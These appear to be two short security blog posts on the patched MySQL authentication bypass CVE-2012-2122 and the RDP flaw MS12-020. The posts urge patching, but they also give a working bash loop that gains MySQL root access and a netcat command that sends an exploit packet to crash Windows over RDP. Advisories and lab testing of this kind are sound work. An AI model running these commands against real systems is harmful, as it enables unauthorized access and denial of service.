A new vulnerability discovered in MySQL Server allow an attacker to gain remote root privileges. According to the original article posted on SC Magazine “Security experts have identified some 879,046 servers vulnerable to a brute force flaw that undermines password controls in MySQL and MariaDB systems.”
This critical vulnerability CVE-2012-2122 was already patched so you have to fix your MySQL server as soon as possible.
The pyton script is still available on Exploit-DB and can be converted in a single line Bash Script:
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
Patch your MySQL !
No Comments »
RDP protocol allows interactive access to systems from remote users. Often it is exposed directly to the internet in order to permit mobile users to connect to the systems.
Recently it was discovered a vulnerability that allows unauthorized users to execute malicious code: this vulnerability is patched by Microsoft via MS12-20. Vulnerability has been classified as critical.
The vulnerability applies to most versions of Microsoft Windows.
- The vulnerability allows remote code execution from an unauthenticated attacker.
- Often, RDP is permitted in from the Internet on the default port to manage various systems.
- Once an exploit becomes available, attackers can easily exploit the vulnerability on exposed and unpatched systems. Automated attacks are possible.
- Itâ€™s not all about attacks from the Internet; internally exposed RDP servers can be targeted by malicious internal users or by malware in case an internal machine becomes infected.
Please refer to http://aluigi.org/adv/termdd_1-adv.txt to read exploit details.
If you want to test the Proof Of Concept you can follow this How To:
- Start a Virtual Machine running a Windows Operating System
- If not, enable Remote Desktop on the Virtual Machine
- Be sure you can reach the Virtual Machine from your host system (i.e.: ping 10.10.10.1)
- Download POC file from here (termdd_1.dat)
- Use NetCat to connect to the Virtual Server sending exploit packet:
nc 10.10.10.1 3389 < termdd_1.dat
- Try several times to got Blue Screen of Death.
There are also several POC written in Ruby and available on pastebin.com: just copy and paste the code in a text file called rdpexploit.rb and set Ruby path (first line of the code must match your Ruby binary path). You need Ruby installed on the system to use it !
Read Microsoft Security Bulletin for MS12-20
No Comments »